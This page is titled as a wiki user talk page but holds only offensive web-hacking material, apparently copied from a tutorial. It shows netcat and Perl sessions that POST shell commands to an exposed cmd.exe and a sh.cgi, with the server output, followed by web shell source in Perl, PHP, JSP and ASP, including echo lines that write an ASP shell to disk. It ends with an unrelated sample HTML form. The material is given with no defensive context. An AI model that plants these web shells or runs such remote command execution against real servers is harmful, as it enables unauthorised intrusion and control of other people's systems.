User talk:Bigheadche

$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17

ver
dir c:\
exit

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
 Volume in drive C has no label.
 Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
              13 File(s)   134,217,728 bytes
                           120,782,848 bytes free

C:\Inetpub\scripts>exit
$

$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60

echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit

HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x  19 root     root         4096 Feb  2  2002 .
drwxr-xr-x  19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x   2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x   2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x   6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x  29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x   8 root     root         4096 Dec  1  2001 home
drwxr-xr-x   4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x   2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x   4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x   3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x  37 root     root            0 Nov 28  2003 proc
drwxr-x---   9 root     root         4096 Feb  9  2003 root
drwxr-xr-x   3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x   2 root     root         4096 Feb  2  2002 src
drwxrwxrwt   7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x   4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x  21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x  16 root     root         4096 Jun 19  2001 var
$

usage: post_cmd.pl url [proxy:port] < data
By Saumil Shah (c) net-square 2001

post_cmd.pl takes all the data to be POSTed to the URL as standard input. Either enter the data manually and hit ^D (unix) or ^Z (dos) to end, or redirect the data using files or pipes.

$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
 Volume in drive C has no label.
 Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a        <DIR>          certs
11/28/00  05:12p        <DIR>          software
12/06/00  03:46p        <DIR>          src
12/07/00  12:50p        <DIR>          weblogic
12/07/00  12:53p        <DIR>          weblogic_publish
12/07/99  01:11p        <DIR>          JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a        <DIR>          urlscan
12/07/99  04:55a        <DIR>          Netscape
              13 File(s)   134,217,728 bytes
                           120,782,848 bytes free

C:\Inetpub\scripts>exit
$

$ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x  19 root     root         4096 Feb  2  2002 .
drwxr-xr-x  19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x   2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x   2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x   6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x  29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x   8 root     root         4096 Dec  1  2001 home
drwxr-xr-x   4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x   2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x   4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x   3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x  37 root     root            0 Nov 28  2003 proc
drwxr-x---   9 root     root         4096 Feb  9  2003 root
drwxr-xr-x   3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x   2 root     root         4096 Feb  2  2002 src
drwxrwxrwt   7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x   4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x  21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x  16 root     root         4096 Jun 19  2001 var
$


#!/usr/bin/perl

require "cgi-lib.pl";

print &PrintHeader;
print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n";
print "<INPUT NAME=cmd TYPE=TEXT>\n";
print "<INPUT TYPE=SUBMIT VALUE=Run>\n";
print "</FORM>\n";

&ReadParse(*in);

if($in{'cmd'} ne "") {
    print " \n$in{'cmd'}\n\n";
    print `/bin/bash -c "$in{'cmd'}"`;
    print " \n";
}

<FORM ACTION="sys.php" METHOD=POST>
Command: <INPUT TYPE=TEXT NAME=cmd>
<INPUT TYPE=SUBMIT VALUE="Run">
</FORM>
<PRE>
<?php
if(isset($cmd)) {
    system($cmd);
}
?>
</PRE>

<FORM METHOD=GET ACTION='cmdexec.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";

    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) {
                output += s;
            }
        }
        catch(IOException e) {
            e.printStackTrace();
        }
    }
%>

<%=output %>

echo ^<^% > cmdasp.asp
echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp
echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp
echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^") >> cmdasp.asp
echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp
echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp
echo szTempFile = ^"C:\^" & oFileSys.GetTempName >> cmdasp.asp
echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True) >> cmdasp.asp
echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"POST^"^> >> cmdasp.asp
echo ^<input type=text name=^".CMD^" size=70 value=^"^<^%= szCMD ^%^>^"^> >> cmdasp.asp
echo ^<input type=submit value=^"Run^"^> >> cmdasp.asp
echo ^</FORM^> >> cmdasp.asp
echo ^<PRE^> >> cmdasp.asp
echo ^<^% >> cmdasp.asp
echo If (IsObject(oFile)) Then >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp
echo oFile.Close >> cmdasp.asp
echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^<^/PRE^> >> cmdasp.asp


<FORM action="http://somesite.com/prog/adduser" method="post">
<P>
First name: <INPUT type="text" name="firstname"><BR>
Last name: <INPUT type="text" name="lastname"><BR>
email: <INPUT type="text" name="email"><BR>
<INPUT type="radio" name="sex" value="Male"> Male<BR>
<INPUT type="radio" name="sex" value="Female"> Female<BR>
<INPUT type="submit" value="Send"> <INPUT type="reset">
</P>
</FORM>